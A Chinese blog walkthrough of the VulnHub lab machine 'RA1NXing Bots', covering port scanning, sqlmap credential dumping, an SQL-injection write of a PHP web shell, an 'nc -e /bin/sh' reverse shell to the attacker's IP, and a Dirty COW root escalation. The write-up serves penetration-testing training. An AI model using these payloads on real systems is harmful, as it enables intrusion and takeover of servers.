oscp——Bot Challenges: RA1NXing Bots

0x00 目标资料 37

链接

https://www.vulnhub.com/entry/bot-challenges-ra1nxing-bots,52/

难度推荐 3

  • 思路 1
  • web——webshell 1.5
  • webshell——rootshel 0.5

环境搭建

  • vmbox

0x01 信息收集

IP

masscan 192.168.124.1/24 --ping --rate 1000000000000000000000000000000

20200228141743.png

端口

nmap -A 192.168.124.20

20200228142744.png

0x02 Web——Webshell

访问一下目标站点,一个很普通的登录页面
20200228142842.png
这种页面一般都是存在sql注入的,直接sqlmap去跑
20200228142951.png
这里找到了一个账号密码

sqlmap -r 1 -D user_db -T users -C "user,pass" --dump
root   | totally not helpful password 

20200228143509.png
尝试使用–os-shell 但是一直都没有成功,这里进行一下手注写入

root' union select  "<?php system($_GET['cmd']); ?>" ," " into outfile '/var/www/cs.php'

成功写入文件
20200228145130.png
反弹一个shell

nc -e /bin/sh 192.168.124.7 1234

20200228145529.png
获取下pty

python -c 'import pty; pty.spawn("/bin/bash")'

20200228145712.png

0x03 Webshell——Rootshell

查看一下版本

uname -a

20200228150540.png
2.6可以用脏牛打穿,打一下,直接获取到rootshell
20200228150658.png

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页